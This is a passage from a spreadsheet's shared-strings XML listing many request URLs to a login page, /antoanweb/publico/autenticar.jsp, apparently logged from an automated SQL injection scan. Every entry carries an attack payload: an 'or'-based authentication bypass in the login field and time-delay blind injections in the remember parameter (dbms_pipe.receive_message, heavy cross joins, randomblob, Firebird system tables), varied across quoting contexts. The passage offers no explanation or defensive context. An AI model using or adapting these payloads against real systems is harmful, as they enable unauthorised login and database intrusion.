    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(('mdih'like'mdih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and((('heri'like'heri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and'czpr'like'czpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and("mmwt"="mmwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(("riwv"="riwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and((("euoc"="euoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and"xdfz"="xdfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and("goyk"like"goyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(("uuiz"like"uuiz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and((("airt"like"airt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and"nvsl"like"nvsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(6428=6428&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((4780=4780&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(((3844=3844&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('nael'='nael&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('neci'='neci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('llaj'='llaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'gvba'='gvba&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('egvh'like'egvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('odzp'like'odzp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('ltiw'like'ltiw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'mimz'like'mimz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("hnhh"="hnhh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("yisf"="yisf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("emdv"="emdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"rcpd"="rcpd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("vvrx"like"vvrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("hhgj"like"hhgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("bntn"like"bntn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6495=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"tyvk"like"tyvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(8288=8288&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((181=181&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(((4154=4154&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and('uidd'='uidd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(('thti'='thti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((('pmsn'='pmsn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and'qpzy'='qpzy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and('joot'like'joot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(('jixd'like'jixd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((('vlji'like'vlji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and'qnln'like'qnln&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and("tapp"="tapp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(("lhjx"="lhjx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((("yrqu"="yrqu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and"mosv"="mosv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and("tunn"like"tunn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(("xxvw"like"xxvw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((("srlc"like"srlc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5087=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and"srop"like"srop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(703=703&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((1934=1934&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(((5900=5900&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('ukoa'='ukoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('wyev'='wyev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('jflw'='jflw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'zpao'='zpao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('nojn'like'nojn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('coxd'like'coxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('ejdm'like'ejdm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'sgzr'like'sgzr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("xdci"="xdci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("opej"="opej&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("eotl"="eotl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"xrhl"="xrhl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("mwov"like"mwov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("bqdg"like"bqdg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("phtd"like"phtd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1217=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"jyuk"like"jyuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(2039=2039&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((4173=4173&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(((2052=2052&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and('ontx'='ontx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(('ermh'='ermh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((('jalb'='jalb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and'nlbs'='nlbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and('jlga'like'jlga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(('gomm'like'gomm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((('xipe'like'xipe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and'ahqv'like'ahqv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and("ztua"="ztua&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(("rdor"="rdor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((("nuyk"="nuyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and"gair"="gair&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and("camu"like"camu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(("gjtv"like"gjtv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((("ipka"like"ipka&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8983=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and"vquf"like"vquf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
